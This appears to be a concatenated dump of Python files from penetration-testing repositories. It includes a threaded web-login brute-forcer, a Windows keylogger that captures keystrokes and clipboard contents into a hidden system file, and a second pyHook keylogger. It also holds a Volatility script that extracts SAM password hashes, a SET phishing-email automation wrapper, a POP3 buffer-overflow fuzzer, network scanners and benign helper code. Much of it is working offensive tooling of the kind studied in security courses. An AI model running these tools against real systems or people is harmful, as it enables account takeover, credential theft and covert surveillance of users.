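# form) alongside the guessed credentials.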
class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False
print "Finished setting up for: %s" % username
def run_bruteforce(self):
for i in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = cookielib.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(target_url)
page = response.read()
print "Trying: %s : %s (%d left)" % (self.username,brute,self.password_q.qsize())
# parse out the hidden fields
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add our username and password fields
post_tags[username_field] = self.username
post_tags[password_field] = brute
login_data = urllib.urlencode(post_tags)
login_response = opener.open(target_post, login_data)
login_result = login_response.read()
if success_check in login_result:
self.found = True
print "[*] Bruteforce successful."
print "[*] Username: %s" % username
print "[*] Password: %s" % brute
print "[*] Waiting for other threads to exit..."
def build_wordlist(wordlist_file):
# read in the word list
fd = open(wordlist_file,"rb")
raw_words = fd.readlines()
fd.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username,words)
bruter_obj.run_bruteforce()
| 26.166667 | 93 | 0.518271 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
Mastering-Machine-Learning-for-Penetration-Testing | import numpy as np
from sklearn import *
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
training_data = np.genfromtxt('dataset.csv', delimiter=',', dtype=np.int32)
inputs = training_data[:,:-1]
outputs = training_data[:, -1]
training_inputs = inputs[:2000]
training_outputs = outputs[:2000]
testing_inputs = inputs[2000:]
testing_outputs = outputs[2000:]
classifier = LogisticRegression()
classifier.fit(training_inputs, training_outputs)
predictions = classifier.predict(testing_inputs)
accuracy = 100.0 * accuracy_score(testing_outputs, predictions)
print ("The accuracy of your Logistic Regression on testing data is: " + str(accuracy))
| 27 | 87 | 0.763948 |
Python-Penetration-Testing-for-Developers | import shelve
def create():
print "This only for One key "
s = shelve.open("mohit.xss",writeback=True)
s['xss']= []
def update():
s = shelve.open("mohit.xss",writeback=True)
val1 = int(raw_input("Enter the number of values "))
for x in range(val1):
val = raw_input("\n Enter the value\t")
(s['xss']).append(val)
s.sync()
s.close()
def retrieve():
r = shelve.open("mohit.xss",writeback=True)
for key in r:
print "*"*20
print key
print r[key]
print "Total Number ", len(r['xss'])
r.close()
while (True):
print "Press"
print " C for Create, \t U for Update,\t R for retrieve"
print " E for exit"
print "*"*40
c=raw_input("Enter \t")
if (c=='C' or c=='c'):
create()
elif(c=='U' or c=='u'):
update()
elif(c=='R' or c=='r'):
retrieve()
elif(c=='E' or c=='e'):
exit()
else:
print "\t Wrong Input" | 18.340909 | 60 | 0.590588 |
cybersecurity-penetration-testing | #!/usr/bin/python
import sys
import netaddr
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import sr1, IP, ICMP
PING_TIMEOUT = 3
IFACE='eth0'
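# Example invocation (placeholder network; netaddr.IPNetwork accepts any CIDR/range spec):
#   pingsweep 192.168.1.0/24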
if __name__ == '__main__':
print '\tQuick Ping Sweep\n'
if len(sys.argv) != 2:
print '[?] Usage: pingsweep <network>'
sys.exit(0)
net = sys.argv[1]
print 'Input network:', net
responding = []
network = netaddr.IPNetwork(net)
for ip in network:
if ip == network.network or ip == network.broadcast:
continue
# Send & wait for response for the ICMP Echo Request packet
reply = sr1( IP(dst=str(ip)) / ICMP(), timeout=PING_TIMEOUT, iface=IFACE, verbose=0 )
if not reply:
continue
if int(reply.getlayer(ICMP).type) == 0 and int(reply.getlayer(ICMP).code) == 0:
print ip, ': Host is responding to ICMP Echo Requests.'
responding.append(ip)
print '[+] Spotted {} ICMP Echo Requests.'.format(len(responding)) | 25.538462 | 93 | 0.610251 |
PenetrationTestingScripts | """Utility functions for HTTP header value parsing and construction.
Copyright 1997-1998, Gisle Aas
Copyright 2002-2006, John J. Lee
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file
COPYING.txt included with the distribution).
"""
import os, re
from types import StringType
from types import UnicodeType
STRING_TYPES = StringType, UnicodeType
from _util import http2time
import _rfc3986
def is_html_file_extension(url, allow_xhtml):
ext = os.path.splitext(_rfc3986.urlsplit(url)[2])[1]
html_exts = [".htm", ".html"]
if allow_xhtml:
html_exts += [".xhtml"]
return ext in html_exts
def is_html(ct_headers, url, allow_xhtml=False):
"""
ct_headers: Sequence of Content-Type headers
url: Response URL
"""
if not ct_headers:
return is_html_file_extension(url, allow_xhtml)
headers = split_header_words(ct_headers)
if len(headers) < 1:
return is_html_file_extension(url, allow_xhtml)
first_header = headers[0]
first_parameter = first_header[0]
ct = first_parameter[0]
html_types = ["text/html"]
if allow_xhtml:
html_types += [
"text/xhtml", "text/xml",
"application/xml", "application/xhtml+xml",
]
return ct in html_types
def unmatched(match):
"""Return unmatched part of re.Match object."""
start, end = match.span(0)
return match.string[:start]+match.string[end:]
token_re = re.compile(r"^\s*([^=\s;,]+)")
quoted_value_re = re.compile(r"^\s*=\s*\"([^\"\\]*(?:\\.[^\"\\]*)*)\"")
value_re = re.compile(r"^\s*=\s*([^\s;,]*)")
escape_re = re.compile(r"\\(.)")
def split_header_words(header_values):
r"""Parse header values into a list of lists containing key,value pairs.
The function knows how to deal with ",", ";" and "=" as well as quoted
values after "=". A list of space separated tokens are parsed as if they
were separated by ";".
If the header_values passed as argument contains multiple values, then they
are treated as if they were a single value separated by comma ",".
This means that this function is useful for parsing header fields that
follow this syntax (BNF as from the HTTP/1.1 specification, but we relax
the requirement for tokens).
headers = #header
header = (token | parameter) *( [";"] (token | parameter))
token = 1*<any CHAR except CTLs or separators>
separators = "(" | ")" | "<" | ">" | "@"
| "," | ";" | ":" | "\" | <">
| "/" | "[" | "]" | "?" | "="
| "{" | "}" | SP | HT
quoted-string = ( <"> *(qdtext | quoted-pair ) <"> )
qdtext = <any TEXT except <">>
quoted-pair = "\" CHAR
parameter = attribute "=" value
attribute = token
value = token | quoted-string
Each header is represented by a list of key/value pairs. The value for a
simple token (not part of a parameter) is None. Syntactically incorrect
headers will not necessarily be parsed as you would want.
This is easier to describe with some examples:
>>> split_header_words(['foo="bar"; port="80,81"; discard, bar=baz'])
[[('foo', 'bar'), ('port', '80,81'), ('discard', None)], [('bar', 'baz')]]
>>> split_header_words(['text/html; charset="iso-8859-1"'])
[[('text/html', None), ('charset', 'iso-8859-1')]]
>>> split_header_words([r'Basic realm="\"foo\bar\""'])
[[('Basic', None), ('realm', '"foobar"')]]
"""
assert type(header_values) not in STRING_TYPES
result = []
for text in header_values:
orig_text = text
pairs = []
while text:
m = token_re.search(text)
if m:
text = unmatched(m)
name = m.group(1)
m = quoted_value_re.search(text)
if m: # quoted value
text = unmatched(m)
value = m.group(1)
value = escape_re.sub(r"\1", value)
else:
m = value_re.search(text)
if m: # unquoted value
text = unmatched(m)
value = m.group(1)
value = value.rstrip()
else:
# no value, a lone token
value = None
pairs.append((name, value))
elif text.lstrip().startswith(","):
# concatenated headers, as per RFC 2616 section 4.2
text = text.lstrip()[1:]
if pairs: result.append(pairs)
pairs = []
else:
# skip junk
non_junk, nr_junk_chars = re.subn("^[=\s;]*", "", text)
assert nr_junk_chars > 0, (
"split_header_words bug: '%s', '%s', %s" %
(orig_text, text, pairs))
text = non_junk
if pairs: result.append(pairs)
return result
join_escape_re = re.compile(r"([\"\\])")
def join_header_words(lists):
"""Do the inverse of the conversion done by split_header_words.
Takes a list of lists of (key, value) pairs and produces a single header
value. Attribute values are quoted if needed.
>>> join_header_words([[("text/plain", None), ("charset", "iso-8859/1")]])
'text/plain; charset="iso-8859/1"'
>>> join_header_words([[("text/plain", None)], [("charset", "iso-8859/1")]])
'text/plain, charset="iso-8859/1"'
"""
headers = []
for pairs in lists:
attr = []
for k, v in pairs:
if v is not None:
if not re.search(r"^\w+$", v):
v = join_escape_re.sub(r"\\\1", v) # escape " and \
v = '"%s"' % v
if k is None: # Netscape cookies may have no name
k = v
else:
k = "%s=%s" % (k, v)
attr.append(k)
if attr: headers.append("; ".join(attr))
return ", ".join(headers)
def strip_quotes(text):
if text.startswith('"'):
text = text[1:]
if text.endswith('"'):
text = text[:-1]
return text
def parse_ns_headers(ns_headers):
"""Ad-hoc parser for Netscape protocol cookie-attributes.
The old Netscape cookie format for Set-Cookie can for instance contain
an unquoted "," in the expires field, so we have to use this ad-hoc
parser instead of split_header_words.
XXX This may not make the best possible effort to parse all the crap
that Netscape Cookie headers contain. Ronald Tschalar's HTTPClient
parser is probably better, so could do worse than following that if
this ever gives any trouble.
Currently, this is also used for parsing RFC 2109 cookies.
"""
known_attrs = ("expires", "domain", "path", "secure",
# RFC 2109 attrs (may turn up in Netscape cookies, too)
"version", "port", "max-age")
result = []
for ns_header in ns_headers:
pairs = []
version_set = False
params = re.split(r";\s*", ns_header)
for ii in range(len(params)):
param = params[ii]
param = param.rstrip()
if param == "": continue
if "=" not in param:
k, v = param, None
else:
k, v = re.split(r"\s*=\s*", param, 1)
k = k.lstrip()
if ii != 0:
lc = k.lower()
if lc in known_attrs:
k = lc
if k == "version":
# This is an RFC 2109 cookie.
v = strip_quotes(v)
version_set = True
if k == "expires":
# convert expires date to seconds since epoch
v = http2time(strip_quotes(v)) # None if invalid
pairs.append((k, v))
if pairs:
if not version_set:
pairs.append(("version", "0"))
result.append(pairs)
return result
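    # For example, parse_ns_headers(['foo=bar; path=/; version=1']) returns
    # [[('foo', 'bar'), ('path', '/'), ('version', '1')]].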
def _test():
import doctest, _headersutil
return doctest.testmod(_headersutil)
if __name__ == "__main__":
_test()
| 33.595041 | 80 | 0.526699 |
owtf | RESULTS = """
<!DOCTYPE html>
<html lang="en">
<body>
<div style="background-color: lightgrey;border:1px solid;border-radius:10px;width:300px;">
<h1>SSL SCAN REPORT</h1>
</div>
<h2> Input url: {{host}}</h2>
<h2> Domain: {{host}}</h2>
<h2> HTTP status code: {{status_code}}</h2>
<h2> IP: {{ip_address}}</h2>
<h2> Grade : {{grade}}</h2>
<h2> Secondary Grade: {{secondary_grade}}</h2>
<h2> Freak : {{freak}}</h2>
<h2> Poodle TLS : {{poodle}} (-3:timeout,-2:TLS not supported,-1:test failed,0:unknown,1:not vulnerable,3:vulnerable)</h2>
<h2> Insecure Renegotiation supported: {{insecure_reneg}}</h2>
<h2> openSslCcs test : {{openssl_ccs}} (-1:test failed,0: unknown,1: not vulnerable,2:possibly vulnerable,3:vulnerable and exploitable)</h2>
<h2> Insecure DH : {{insecure_dh}} </h2>
{{protocol}}
<h2> Certificate Expired : {{cert_exp}}</h2>
<h2> Self-signed cert: {{self_signed}}</h2>
<h2> Supports RC4: {{rc4}}</h2>
<h2> Forward secrecy support: {{fwd_sec}} (1:set if at least one browser from our simulations negotiated a Forward Secrecy suite,2:set based on Simulator results if FS is achieved with modern clients. For example, the server supports ECDHE suites, but not DHE,4:set if all simulated clients achieve FS. In other words, this requires an ECDHE + DHE combination to be supported.)</h2>
{{cert_chains}}
<h2> Secure renegotiation support: {{sec_reneg}}</h2>
</body>
</html>
"""
| 49.931034 | 384 | 0.647696 |
Python-Penetration-Testing-for-Developers | import urllib
from bs4 import BeautifulSoup
url = raw_input("Enter the URL ")
ht= urllib.urlopen(url)
html_page = ht.read()
b_object = BeautifulSoup(html_page)
print b_object.title
print b_object.title.text
for link in b_object.find_all('a'):
print(link.get('href'))
| 21.5 | 35 | 0.736059 |
cybersecurity-penetration-testing | import threading
import time
import socket, subprocess,sys
import thread
import collections
from datetime import datetime
'''section 1'''
net = raw_input("Enter the Network Address ")
st1 = int(raw_input("Enter the starting Number "))
en1 = int(raw_input("Enter the last Number "))
en1=en1+1
dic = collections.OrderedDict()
net1= net.split('.')
a = '.'
net2 = net1[0]+a+net1[1]+a+net1[2]+a
t1= datetime.now()
'''section 2'''
class myThread (threading.Thread):
def __init__(self,st,en):
threading.Thread.__init__(self)
self.st = st
self.en = en
def run(self):
run1(self.st,self.en)
'''section 3'''
def scan(addr):
sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = sock.connect_ex((addr,135))
if result==0:
sock.close()
return 1
else :
sock.close()
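# scan() uses TCP port 135 (Microsoft RPC) as its liveness probe, so only hosts
# exposing that port (typically Windows machines) are reported as live.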
def run1(st1,en1):
for ip in xrange(st1,en1):
addr = net2+str(ip)
if scan(addr):
dic[ip]= addr
'''section 4'''
total_ip =en1-st1
tn =20 # number of ip handled by one thread
total_thread = total_ip/tn
total_thread=total_thread+1
threads= []
try:
for i in xrange(total_thread):
#print "i is ",i
en = st1+tn
if(en >en1):
en =en1
thread = myThread(st1,en)
thread.start()
threads.append(thread)
st1 =en
except:
print "Error: unable to start thread"
print "\tNumber of Threads active:", threading.activeCount()
for t in threads:
t.join()
print "Exiting Main Thread"
dict = collections.OrderedDict(sorted(dic.items()))
for key in dict:
print dict[key],"-->" "Live"
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total | 22.086957 | 60 | 0.675879 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
senderMac = "aa:aa:aa:aa:aa:aa"
broadcastMac = "ff:ff:ff:ff:ff:ff"
for ssid in open('ssidList.txt', 'r').readlines():
pkt = RadioTap()/Dot11(type = 0, subtype = 4 ,addr1 = broadcastMac, addr2 = senderMac, addr3 = broadcastMac)/Dot11ProbeReq()/Dot11Elt(ID=0, info =ssid.strip()) / Dot11Elt(ID=1, info = "\x02\x04\x0b\x16") / Dot11Elt(ID=3, info="\x08")
print ("Checking ssid:" + ssid)
print(pkt.show())
sendp (pkt, iface ="en0", count=1)
| 36.076923 | 237 | 0.64657 |
cybersecurity-penetration-testing | # Cryptomath Module
# http://inventwithpython.com/hacking (BSD Licensed)
def gcd(a, b):
# Return the GCD of a and b using Euclid's Algorithm
while a != 0:
a, b = b % a, a
return b
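# Quick sanity checks: gcd(24, 32) == 8 and findModInverse(7, 26) == 15, since
# (7 * 15) % 26 == 1; callers such as the affine cipher hacker rely on
# gcd(keyA, symbol-set size) == 1 before inverting keyA.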
def findModInverse(a, m):
# Returns the modular inverse of a % m, which is
# the number x such that a*x % m = 1
if gcd(a, m) != 1:
return None # no mod inverse if a & m aren't relatively prime
# Calculate using the Extended Euclidean Algorithm:
u1, u2, u3 = 1, 0, a
v1, v2, v3 = 0, 1, m
while v3 != 0:
q = u3 // v3 # // is the integer division operator
v1, v2, v3, u1, u2, u3 = (u1 - q * v1), (u2 - q * v2), (u3 - q * v3), v1, v2, v3
return u1 % m | 29.5 | 89 | 0.54446 |
Penetration_Testing |
'''
Suggestion:
Use py2exe to turn this script into a Windows executable.
Example: python setup.py py2exe
Run as administrator to store file under current path.
Change pathname if administrator level privilege is not possible.
'''
import pyHook
import pythoncom
import sys
import logging
from ctypes import *
from win32clipboard import OpenClipboard, GetClipboardData, CloseClipboard
from datetime import datetime
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
file_log = "C:\\Windows\\systemlog.txt"
def get_current_process():
# Get a handle to the foreground window
fg_window = user32.GetForegroundWindow()
# Find the process ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(fg_window, byref(pid))
# Store the current process ID
process_id = "{}".format(pid.value)
# Grab the executable
executable = create_string_buffer("\x00" * 512)
fg_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
# Get the executable name
psapi.GetModuleBaseNameA(fg_process, None, byref(executable), 512)
# Read the executable name
window_title = create_string_buffer("\x00" * 512)
length = user32.GetWindowTextA(fg_window, byref(window_title), 512)
# Get the current time
time_now = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
with open(file_log, 'a+') as f:
# Print out the header if we're in the right process
data1 = "\n{} - PID: {} - {} - {}:\n".format(time_now, process_id, executable.value, window_title.value)
f.write(data1)
# Close handles
kernel32.CloseHandle(fg_window)
kernel32.CloseHandle(fg_process)
def OnKeyboardEvent(event):
global current_window
# Check to see if the target changed windows
if event.WindowName != current_window:
current_window = event.WindowName
get_current_process()
with open(file_log, 'a+') as f:
# If the target presses a standard key
if event.Ascii > 32 and event.Ascii < 127:
data = chr(event.Ascii)
f.write(data)
else:
# If [Ctrl-V], get the value on the clipboard
if event.Key == "V":
OpenClipboard()
pasted_value = GetClipboardData()
CloseClipboard()
data = "[PASTE] - {}".format(pasted_value)
f.write(data)
else:
data = "[{}]".format(event.Key)
f.write(data)
# Pass execution to the next hook registered
return True
# Create and register a hook manager
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
# Register the hook and execute forever
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
| 23.696078 | 106 | 0.72081 |
cybersecurity-penetration-testing | import sys
import struct
memory_file = "WinXPSP2.vmem"
sys.path.append("/Downloads/volatility-2.3.1")
import volatility.conf as conf
import volatility.registry as registry
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
config.parse_options()
config.PROFILE = "WinXPSP2x86"
config.LOCATION = "file://%s" % memory_file
registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)
from volatility.plugins.registry.registryapi import RegistryApi
from volatility.plugins.registry.lsadump import HashDump
registry = RegistryApi(config)
registry.populate_offsets()
sam_offset = None
sys_offset = None
for offset in registry.all_offsets:
if registry.all_offsets[offset].endswith("\\SAM"):
sam_offset = offset
print "[*] SAM: 0x%08x" % offset
if registry.all_offsets[offset].endswith("\\system"):
sys_offset = offset
print "[*] System: 0x%08x" % offset
if sam_offset is not None and sys_offset is not None:
config.sys_offset = sys_offset
config.sam_offset = sam_offset
hashdump = HashDump(config)
for hash in hashdump.calculate():
print hash
break
if sam_offset is None or sys_offset is None:
print "[*] Failed to find the system or SAM offsets." | 25.4 | 68 | 0.69745 |
owtf | #!/usr/bin/env python
"""
This is the command-line front-end in charge of processing arguments and call the framework
"""
import getopt
import os
import subprocess
import sys
from collections import defaultdict
def GetName():
return sys.argv[0]
def Usage(Message):
print("Usage:")
print(
GetName()
+ " EMAIL_TARGET=? EMAIL_FROM=? SMTP_LOGIN=? SMTP_PASS=? SMTP_HOST=? SMTP_PORT=? EMAIL_PRIORITY=? PDF_TEMPLATE=? MSF_LISTENER_PORT=? MSF_LISTENER_SETUP=? ATTACHMENT_NAME=? SET_EMAIL_TEMPLATE=? PHISHING_PAYLOAD=? PHISHING_SCRIPT_DIR=? TOOL_SET_DIR=?"
)
print("ERROR: " + Message)
sys.exit(-1)
def ShellExec(Command):
print("\nExecuting (Control+C to abort THIS COMMAND ONLY):\n" + Command)
Output = ""
try: # Stolen from: http://stackoverflow.com/questions/5833716/how-to-capture-output-of-a-shell-script-running-in-a-separate-process-in-a-wxpyt
proc = subprocess.Popen(Command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1)
while True:
line = proc.stdout.readline()
if not line:
break
print(multi_replace(line, {"\n": "", "\r": ""})) # Show progress on the screen too!
Output += line # Save as much output as possible before a tool crashes! :)
    except KeyboardInterrupt:
        Output += "\n[!] Command aborted by user"  # Identify as Command Level abort
return Output
# Perform multiple replacements in one go using the replace dictionary in format: { 'search' : 'replace' }
def multi_replace(Text, ReplaceDict):
NewText = Text
for Search, Replace in ReplaceDict.items():
NewText = NewText.replace(Search, str(Replace))
return NewText
def GetParams(): # Basic validation and parameter retrieval:
MandatoryParams = [
"EMAIL_TARGET",
"EMAIL_FROM",
"SMTP_LOGIN",
"SMTP_PASS",
"SMTP_HOST",
"SMTP_PORT",
"EMAIL_PRIORITY",
"PDF_TEMPLATE",
"MSF_LISTENER_PORT",
"MSF_LISTENER_SETUP",
"ATTACHMENT_NAME",
"SET_EMAIL_TEMPLATE",
"PHISHING_PAYLOAD",
"PHISHING_SCRIPT_DIR",
"TOOL_SET_DIR",
]
ScriptName = GetName()
try:
Opts, Args = getopt.getopt(sys.argv[1:], "a:")
except getopt.GetoptError:
Usage("Invalid " + ScriptName + " option(s)")
Params = defaultdict(list)
for Arg in Args:
Chunks = Arg.split("=")
if len(Chunks) != 2:
Usage("'" + str(Arg) + "' is incorrect: The parameter format is ARGNAME=ARGVALUE")
ArgName = Chunks[0]
ArgValue = Arg.replace(ArgName + "=", "")
Params[ArgName] = ArgValue
for Mandatory in MandatoryParams:
if Mandatory not in Params:
Usage("Must include parameter: " + Mandatory)
SETScript = Params["PHISHING_SCRIPT_DIR"] + "/set_scripts/payload" + Params["PHISHING_PAYLOAD"] + ".set"
SETDebugAutomate = Params["PHISHING_SCRIPT_DIR"] + "/set_debug_automate.sh"
MandatoryPaths = [
Params["TOOL_SET_DIR"], Params["PDF_TEMPLATE"], Params["EMAIL_TARGET"], SETScript, SETDebugAutomate
]
for Path in MandatoryPaths:
if not os.path.exists(Path):
Usage("The path '" + str(Path) + "' must exist in your filesystem")
Params["SET_PARAMS_SCRIPT"] = SETScript
Params["SET_TMP_SCRIPT"] = "/tmp/set_tmp_script.set"
Params["SET_DEBUG_AUTOMATE"] = SETDebugAutomate
return Params
Params = GetParams() # Step 1 - Retrieve params and basic validation
with open(
Params["SET_TMP_SCRIPT"], "w"
) as file: # Step 2 - Create temporary script with hard-coded values from parameters:
file.write(multi_replace(open(Params["SET_PARAMS_SCRIPT"]).read(), Params))
ShellExec(
Params["SET_DEBUG_AUTOMATE"] + " " + Params["TOOL_SET_DIR"] + " " + Params["SET_TMP_SCRIPT"]
) # Step 3 - Run SET script
ShellExec("rm -f " + Params["SET_TMP_SCRIPT"]) # Step 4 - Remove temporary script with hard-coded values
| 34.964286 | 257 | 0.633722 |
cybersecurity-penetration-testing | # Affine Cipher Hacker
# http://inventwithpython.com/hacking (BSD Licensed)
import pyperclip, affineCipher, detectEnglish, cryptomath
SILENT_MODE = False
def main():
# You might want to copy & paste this text from the source code at
# http://invpy.com/affineHacker.py
myMessage = """U&'<3dJ^Gjx'-3^MS'Sj0jxuj'G3'%j'<mMMjS'g{GjMMg9j{G'g"'gG'<3^MS'Sj<jguj'm'P^dm{'g{G3'%jMgjug{9'GPmG'gG'-m0'P^dm{LU'5&Mm{'_^xg{9"""
hackedMessage = hackAffine(myMessage)
if hackedMessage != None:
# The plaintext is displayed on the screen. For the convenience of
# the user, we copy the text of the code to the clipboard.
print('Copying hacked message to clipboard:')
print(hackedMessage)
pyperclip.copy(hackedMessage)
else:
print('Failed to hack encryption.')
def hackAffine(message):
print('Hacking...')
# Python programs can be stopped at any time by pressing Ctrl-C (on
# Windows) or Ctrl-D (on Mac and Linux)
print('(Press Ctrl-C or Ctrl-D to quit at any time.)')
# brute-force by looping through every possible key
for key in range(len(affineCipher.SYMBOLS) ** 2):
keyA = affineCipher.getKeyParts(key)[0]
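        # keyA must be coprime with the symbol-set size for an affine key to be valid; skip it otherwise.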
if cryptomath.gcd(keyA, len(affineCipher.SYMBOLS)) != 1:
continue
decryptedText = affineCipher.decryptMessage(key, message)
if not SILENT_MODE:
print('Tried Key %s... (%s)' % (key, decryptedText[:40]))
if detectEnglish.isEnglish(decryptedText):
# Check with the user if the decrypted key has been found.
print()
print('Possible encryption hack:')
print('Key: %s' % (key))
print('Decrypted message: ' + decryptedText[:200])
print()
print('Enter D for done, or just press Enter to continue hacking:')
response = input('> ')
if response.strip().upper().startswith('D'):
return decryptedText
return None
# If affineHacker.py is run (instead of imported as a module) call
# the main() function.
if __name__ == '__main__':
main() | 35.35 | 149 | 0.609633 |
Effective-Python-Penetration-Testing | import pyHook, pythoncom, sys, logging
file_log='C:\\log.txt'
def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
#instantiate HookManager class
hooks_manager = pyHook.HookManager ()
#listen to all keystrokes
hooks_manager.KeyDown = OnKeyboardEvent
#hook the keyboard
hooks_manager.HookKeyboard ()
#Pump all messages for current thread
pythoncom.PumpMessages () | 25.052632 | 83 | 0.773279 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from anonBrowser import *
from BeautifulSoup import BeautifulSoup
import os
import optparse
import re
def printLinks(url):
ab = anonBrowser()
ab.anonymize()
page = ab.open(url)
html = page.read()
try:
print '[+] Printing Links From Regex.'
link_finder = re.compile('href="(.*?)"')
links = link_finder.findall(html)
for link in links:
print link
except:
pass
try:
print '\n[+] Printing Links From BeautifulSoup.'
soup = BeautifulSoup(html)
links = soup.findAll(name='a')
for link in links:
if link.has_key('href'):
print link['href']
except:
pass
def main():
parser = optparse.OptionParser('usage %prog ' +\
'-u <target url>')
parser.add_option('-u', dest='tgtURL', type='string',\
help='specify target url')
(options, args) = parser.parse_args()
url = options.tgtURL
if url == None:
print parser.usage
exit(0)
else:
printLinks(url)
if __name__ == '__main__':
main()
| 18.534483 | 58 | 0.55742 |
Penetration-Testing-Study-Notes | #!/usr/bin/python
import socket
#create an array of buffers, while incrementing them
buffer=["A"]
counter=100
while len(buffer) <=30:
buffer.append("A"*counter)
counter=counter+200
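# buffer now holds payloads of length 1, 100, 300, 500, ... (step 200) until the list grows past 30 entries.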
for string in buffer:
print "Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.11.13.62',110))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS ' + string + '\r\n')
s.send('QUIT\r\n')
s.close()
| 20.363636 | 52 | 0.688699 |
owtf | """
owtf.lib.cli_options
~~~~~~~~~~~~~~~~~~~~
Main CLI processing machine
"""
from __future__ import print_function
import argparse
import sys
def usage(error_message):
"""Display the usage message describing how to use owtf.
:param error_message: Error message to display
:type error_message: `str`
:return: None
:rtype: None
"""
full_path = sys.argv[0].strip()
main = full_path.split("/")[-1]
print("Current Path: {}".format(full_path))
print(
"Syntax: {}"
" [ options ] <target1 target2 target3 ..> where target can be:"
" <target URL / hostname / IP>".format(main)
)
print(" NOTE:" " targets can also be provided via a text file", end="\n" * 3)
print("Examples: ", end="\n" * 2)
print("Run all web plugins: {}" " http://my.website.com".format(main))
print("Run only passive + semi_passive plugins: {}" " -t quiet http://my.website.com".format(main))
print("Run only active plugins: {}" " -t active http://my.website.com".format(main))
print()
print(
"Run all plugins except 'OWASP-CM-001: Testing_for_SSL-TLS': {}"
" -e 'OWASP-CM-001' http://my.website.com".format(main)
)
print(
"Run all plugins except 'OWASP-CM-001: Testing_for_SSL-TLS': {}"
" -e 'Testing_for_SSL-TLS' http://my.website.com".format(main)
)
print()
print(
"Run only 'OWASP-CM-001: Testing_for_SSL-TLS': {}"
" -o 'OWASP-CM-001' http://my.website.com".format(main)
)
print(
"Run only 'OWASP-CM-001: Testing_for_SSL-TLS': {}"
" -o 'Testing_for_SSL-TLS' http://my.website.com".format(main)
)
print()
print(
"Run only OWASP-IG-005 and OWASP-WU-VULN: {}"
" -o 'OWASP-IG-005,OWASP-WU-VULN' http://my.website.com".format(main)
)
print(
"Run using my resources file and proxy: {}"
" -m r:/home/me/owtf_resources.cfg"
" -x 127.0.0.1:8080 http://my.website.com".format(main)
)
print()
print(
"Run using TOR network: {}"
" -o OWTF-WVS-001 http://my.website.com"
" --tor 127.0.0.1:9050:9051:password:1".format(main)
)
if error_message:
print("\nERROR: {}".format(error_message))
from owtf.core import finish
finish()
def parse_options(cli_options, valid_groups, valid_types):
"""Main arguments processing for the CLI
:param cli_options: CLI args Supplied by user
:type cli_options: `dict`
:param valid_groups: Plugin groups to chose from
:type valid_groups: `list`
:param valid_types: Plugin types to chose from
:type valid_types: `list`
:return:
:rtype:
"""
parser = argparse.ArgumentParser(
prog="owtf",
description="OWASP OWTF, the Offensive (Web) Testing Framework, is "
"an OWASP+PTES-focused try to unite great tools and "
"make pentesting more efficient @owtfp http://owtf.org"
"\nAuthor: Abraham Aranguren <name.surname@owasp.org> - "
"http://7-a.org - Twitter: @7a_",
)
parser.add_argument(
"-l",
"--list-plugins",
dest="list_plugins",
default=None,
choices=valid_groups,
help="List available plugins in the plugin group (web, network or auxiliary)",
)
parser.add_argument(
"-f",
"--force",
dest="force_overwrite",
action="store_true",
help="Force plugin result overwrite (default is avoid overwrite)",
)
parser.add_argument(
"-i",
"--interactive",
dest="interactive",
default="yes",
help="interactive: yes (default, more control) / no (script-friendly)",
)
parser.add_argument(
"-e",
"--except",
dest="except_plugins",
default=None,
help="Comma separated list of plugins to be ignored in the test",
)
parser.add_argument(
"-o",
"--only",
dest="only_plugins",
default=None,
help="Comma separated list of the only plugins to be used in the test",
)
parser.add_argument(
"-p",
"--inbound-proxy",
dest="inbound_proxy",
default=None,
help="(ip:)port - Setup an inbound proxy for manual site analysis",
)
parser.add_argument(
"-x",
"--outbound-proxy",
dest="outbound_proxy",
default=None,
help="type://ip:port - Send all OWTF requests using the proxy "
"for the given ip and port. The 'type' can be 'http'(default) "
"or 'socks'",
)
parser.add_argument(
"-xa",
"--outbound-proxy-auth",
dest="outbound_proxy_auth",
default=None,
help="username:password - Credentials if any for outbound proxy",
)
parser.add_argument(
"-T",
"--tor",
dest="tor_mode",
default=None,
help="ip:port:tor_control_port:password:IP_renew_time - "
"Sends all OWTF requests through the TOR network. "
"For configuration help run -T help.",
)
parser.add_argument(
"-s",
"--simulation",
dest="Simulation",
action="store_true",
help="Do not do anything, simply simulate how plugins would run",
)
parser.add_argument(
"-g",
"--plugin-group",
dest="plugin_group",
default=None,
